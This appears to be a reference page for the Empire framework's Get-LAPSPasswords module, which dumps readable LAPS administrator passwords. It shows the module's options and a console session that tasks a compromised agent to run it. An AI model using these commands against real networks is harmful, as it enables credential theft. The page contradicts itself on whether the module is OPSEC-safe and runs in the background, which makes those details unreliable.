Get-LAPSPasswords - Empire Module


This page contains detailed information about how to use the powershell/credentials/get_lapspasswords Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Get-LAPSPasswords
Module: powershell/credentials/get_lapspasswords
Source code [1]: empire/server/modules/powershell/credentials/get_lapspasswords.yaml
Source code [2]: empire/server/data/module_source/credentials/Get-LAPSPasswords.ps1
MITRE ATT&CK: T1003
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

The get_lapspasswords module dumps user readable LAPS passwords using kfosaaen's Get-LAPSPasswords.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the get_lapspasswords module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the get_lapspasswords module:

Agent
Agent to run module on.

Additional Module Options


This is a list of additional options that are supported by the get_lapspasswords module:

OutputFunction
PowerShell's output function to use ("Out-String", "ConvertTo-Json", "ConvertTo-Csv", "ConvertTo-Html", "ConvertTo-Xml").
Default value: Out-String.
Suggested values: Out-String, ConvertTo-Json, ConvertTo-Csv, ConvertTo-Html, ConvertTo-Xml.

Get_lapspasswords Example Usage


Here's an example of how to use the get_lapspasswords module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/get_lapspasswords

 Author       kfosaaen                                                               
              n0decaf                                                                
 Background   True                                                                   
 Comments     https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-         
              LAPSPasswords.ps1                                                      
 Description  Dumps user readable LAPS passwords using kfosaaen's Get-LAPSPasswords. 
 Language     powershell                                                             
 Name         powershell/credentials/get_lapspasswords                               
 NeedsAdmin   False                                                                  
 OpsecSafe    True                                                                   
 Techniques   http://attack.mitre.org/techniques/T1003                               


,Record Options--,------------,----------,-------------------------------------,
| Name           | Value      | Required | Description                         |
|----------------|------------|----------|-------------------------------------|
| Agent          |            | True     | Agent to run module on.             |
|----------------|------------|----------|-------------------------------------|
| OutputFunction | Out-String | False    | PowerShell's output function to use |
|                |            |          | ("Out-String", "ConvertTo-Json",    |
|                |            |          | "ConvertTo-Csv", "ConvertTo-Html",  |
|                |            |          | "ConvertTo-Xml").                   |
'----------------'------------'----------'-------------------------------------'

(Empire: usemodule/powershell/credentials/get_lapspasswords) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/get_lapspasswords) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


  • kfosaaen
  • n0decaf

References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.